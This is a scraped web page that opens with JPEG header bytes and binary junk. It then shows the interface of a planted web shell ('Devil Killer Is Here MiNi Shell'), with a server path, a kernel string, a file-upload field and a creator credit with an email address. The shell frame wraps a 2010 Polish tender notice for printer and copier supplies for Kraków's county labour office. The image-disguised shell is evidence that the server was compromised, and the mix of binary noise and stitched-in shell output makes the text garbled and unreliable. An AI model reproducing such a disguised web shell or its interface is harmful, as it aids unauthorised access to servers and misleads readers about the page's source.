JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100810/244628-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
na dostawę materiałów eksploatacyjnych do urządzeń drukujących i kopiujących 
dla Urzędu Pracy Powiatu Krakowskiego, znak sprawy: ZP- 271/42/2010</b><br>
<b>Numer ogłoszenia: 244628 - 2010; data zamieszczenia: 10.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
na dostawę materiałów eksploatacyjnych do urządzeń drukujących i kopiujących 
dla Urzędu Pracy Powiatu Krakowskiego, znak sprawy: ZP- 271/42/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa fabrycznie nowych, wolnych od wad materiałów eksploatacyjnych do urządzeń drukujących i kopiujących szczegółowo określonych w załączniku nr 1 do SIWZ. 
2.	Pod pojęciem fabrycznie nowe Zamawiający rozumie produkty wykonane z nowych elementów, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z widocznym logo, opisem zawartości, symbolem produktu i terminem przydatności do użytku, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem/tuszem.
3.	Okres przydatności do użycia materiałów eksploatacyjnych wyszczególnionych w załączniku nr 1 wyniesie minimum 12 miesięcy licząc od daty dostawy. 
4.	Dostawy będą następować systematycznie, stosownie do potrzeb Zamawiającego, po wcześniejszym zamówieniu określonych materiałów eksploatacyjnych. 
5.	Zamówienie będzie Wykonawcy przekazane faxem, elektronicznie lub pisemnie. 
6.	Wykonawca zobowiązany jest do dostarczenia wskazanych przez Zamawiającego materiałów eksploatacyjnych w terminie do 3 dni licząc od daty otrzymania zamówienia.
7.	Zamówione każdorazowo materiały eksploatacyjne Wykonawca ma obowiązek dostarczyć do następujących lokalizacji: 
a.	siedziba główna UPPK, ul. Mazowiecka 21, 30-019 Kraków;
b.	Filia UPPK w Skawinie, ul. Ogrody 17;
c.	Filia UPPK w Słomnikach, ul. Kościuszki 64;
d.	Filia UPPK w Krzeszowicach, ul. Kościuszki 3;
e.	Archiwum Zakładowe w Skawinie, ul. Kopernika 13. 
Wykonawca dostarczy zamówione materiały eksploatacyjne, swoim transportem, do lokalizacji wskazanych powyżej, w godz. 8.30 -15.00 w dni powszednie od poniedziałku do piątku. 
8.	Wszystkie materiały eksploatacyjne muszą być zgodne z normami i gwarancjami producentów odpowiednich drukarek.
9.	Na etapie realizacji zamówienia, Zamawiający zastrzega sobie prawo do ewentualnej zmiany ilości zakupionych materiałów eksploatacyjnych, stosownie do jego potrzeb. Zmiana dotyczyć może tylko materiałów eksploatacyjnych określonych w załączniku nr 1 do SIWZ, np. Zamawiający, w okresie obowiązywania umowy, zamówi więcej tonerów do drukarki A natomiast mniej tonerów do drukarki B. Zmiany nie mogą dotyczyć materiałów eksploatacyjnych nie wymienionych w załączniku nr 1 do SIWZ.
10.	Zamawiający dopuszcza składanie ofert na materiały eksploatacyjne jakościowo równoważne.
11.	Przez produkt równoważy Zamawiający rozumie produkt o takich samych bądź lepszych parametrach odnoszących się do: pojemności  tuszu/tonera, wydajności i jakości wydruku.  Produkt równoważny nie może być produktem regenerowanym ani poddanym procesowi ponownego napełniania lub wymiany jakichkolwiek elementów. 
12.	Wykonawca gwarantuje, że dostarczone tonery i wkłady drukujące będą wysokiej jakości oraz zapewniają kompatybilność pracy z urządzeniami Zamawiającego do których są zamawiane, zapewniają należyte bezpieczeństwo oraz posiadają właściwe opakowanie i oznakowanie, o którym mowa w punkcie I.2) SIWZ.
13.	Wykonawca gwarantuje, że użytkowanie dostarczonych przez niego wkładów drukujących nie spowoduje utraty praw gwarancji producenta urządzenia, do którego są przeznaczone. 
14.	Zamawiający zobowiązuje się do zbadania towaru dostarczonego każdorazowo przez Wykonawcę zgodnie z zamówieniem w ciągu 2 dni od jego dostarczenia. Sprawdzeniu będzie podlegała zgodność ilości oraz rodzaju dostarczonego towaru w stosunku do poszczególnego zamówienia oraz rodzaju towaru w stosunku do treści oferty. W razie stwierdzenia przez Zamawiającego nieprawidłowości w dostarczonym towarze, Zamawiający złoży Wykonawcy reklamację w terminie 2 dni liczonych od dnia stwierdzenia nieprawidłowości. Wykonawca jest zobowiązany rozpatrzyć reklamację i udzielić Zamawiającemu pisemnej odpowiedzi czy reklamacje uznaje, w terminie 2 dni od otrzymania reklamacji. W razie uznania reklamacji Wykonawca jest zobowiązany do wymiany produktu na nowy, wolny od wad w terminie 2 dni licząc od dnia uznania reklamacji. W przypadku wykrycia wad dostarczonego towaru podczas jego eksploatacji, Zamawiający ma prawo złożenia reklamacji w każdym czasie trwania umowy, zawiadamiając Wykonawcę niezwłocznie po ujawnieniu wady. Korespondencja w powyższym zakresie następować będzie jedna ze wskazanych form tj. faksem, mailem lub pocztą. Wymiany o której mowa powyżej Wykonawca dokonywać będzie na własny koszt. 
15.	Wykonawca zobowiązuje się do pokrycia kosztów naprawy urządzenia drukującego lub kopiującego, w sytuacji gdy jego uszkodzenie powstało w wyniku stosowania materiału eksploatacyjnego dostarczonego przez Wykonawcę. Podstawą żądania przez Zamawiającego naprawy urządzenia na koszt Wykonawcy (włączając w to wymianę bębna lub głowicy) będzie pisemna opinia autoryzowanego serwisu producenta urządzenia. Naprawa urządzenia wykonana zostanie w autoryzowanym serwisie producenta urządzenia w ciągu 3 dni od dnia zgłoszenia Wykonawcy przez Zamawiającego konieczności wykonania naprawy. Zgłoszenie konieczności wykonania naprawy przesłane zostanie Wykonawcy faxem lub elektronicznie. Koszty związane z naprawą ponosi Wykonawca.
16.	Zobowiązania Wykonawcy wynikające z treści punktów I.14) oraz I.15) SIWZ obowiązywały będą także po upływie terminu, na jaki zawarta zostanie umowa w sprawie zamówienia publicznego, tj. po upływie 31 grudnia 2010 r. do czasu całkowitego zużycia przez Zamawiającego dostarczonych przez Wykonawcę materiałów eksploatacyjnych. 
1)	Toner do OKI 3200  czarny, wydajność co najmniej 3000 str	, sztuk 5
2)	Toner do OKI 3200 magenta, wydajność co najmniej 1500 str, sztuk 3
3)	Bęben światłoczuły 3200 black do drukarki OKI 3200, wydajność co najmniej 14000 str, sztuk 6
4)	Bęben światłoczuły  3200 cyan do drukarki OKI 3200, wydajność co najmniej 14000 str, sztuk 5
5)	Bęben światłoczuły  3200 magenta do drukarki OKI 3200, wydajność co najmniej	14000 str, sztuk	5
6)	Bęben światłoczuły  3200 yellow do drukarki OKI 3200, wydajność co najmniej	14000 str, sztuk	5
7)	Taśma do drukarki OKI 3321, wydajność co najmniej	3 mln znaków, sztuk 55
8)	Taśma do drukarki OKI 3320,wydajność co najmniej 3 mln znaków, sztuk 50
9)	Toner do drukarki HP LJ 3015, wydajność co najmniej	2000 str, sztuk 4
10)	Toner do drukarki HP LJ 3055,	wydajność co najmniej 2000 str, sztuk16
11)	Toner  do drukarki Brother  5150 D,wydajność co najmniej 3500 str, sztuk 25
12)	Bęben światłoczuły do drukarki Brother 5150 D,	wydajność co najmniej 20000 str, sztuk	5
13)	Toner  do drukarki Brother  5170,wydajność co najmniej 3500 str, sztuk	4
14)	Bęben światłoczuły do drukarki Brother HL 5170,	wydajność co najmniej 20000 str, sztuk	1
15)	Toner do drukarki Brother HL 5240,wydajność co najmniej 3500 str, sztuk	12
16)	Bęben światłoczuły do drukarki Brother HL 5240,	wydajność co najmniej 25000 str, sztuk	5
17)	Toner do drukarki Brother 5250 DN,	wydajność co najmniej 3500 str, sztuk	55
18)	Bęben światłoczuły do drukarki Brother 5250 DN,wydajność co najmniej 25000 str, sztuk	30
19)	Toner do drukarki Epson AcuLaser C 2600 czarny, wydajność co najmniej 5000 str, sztuk	1
20)	Toner do kserokopiarki Bizhub 203 Konica Minolta czarny, wydajność co najmniej 24500 str, sztuk	2
21)	Toner do kserokopiarki Bizhub 203 Konica Minolta cyan, wydajność co najmniej 19000 str, sztuk	2
22)	Toner do kserokopiarki Bizhub 203 Konica Minolta magenta,	wydajność co najmniej 19000 str, sztuk	2
23)	Toner do kserokopiarki Bizhub 203 Konica Minolta yellow, wydajność co najmniej 19000 str, sztuk	2
24)	Bęben do kserokopiarki Bizhub 203 Konica Minolta czarny, wydajność co najmniej 70000 str, sztuk	3
25)	Bęben do kserokopiarki Bizhub 203 Konica Minolta cyan, wydajność co najmniej 5000 str, sztuk	1
26)	Bęben do kserokopiarki Bizhub 203 Konica Minolta magenta, 	wydajność co najmniej55000 str, sztuk	1
27)	Bęben do kserokopiarki Bizhub 203 Konica Minolta yellow, wydajność co najmniej 55000 str, sztuk 1
28)	Toner do urządzenia wielofunkcyjnego KONICA MINOLTA BIZHUB 250, 	wydajność co najmniej 20000 str, sztuk 3
29)	Bęben do Konica Minolta Bizhub 211, wydajność co najmniej 60000 str, sztuk 2
30)	Matryce do powielacza cyfrowego RICOH JP 1215, wydajność co najmniej 300 matryc, sztuk 2
31)	Naboje do powielacza cyfrowego RICOH JP 1215	, sztuk 3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2, 30.12.51.20-8, 30.19.23.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 2 do SIWZ;
2.	Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych;
3.	Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 5 do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od zamawiającego lub wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, zmiany ilości zakupionych materiałów eksploatacyjnych, o której mowa w pkt. I. 9 SIWZ, ilości miejsc dostaw materiałów eksploatacyjnych. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com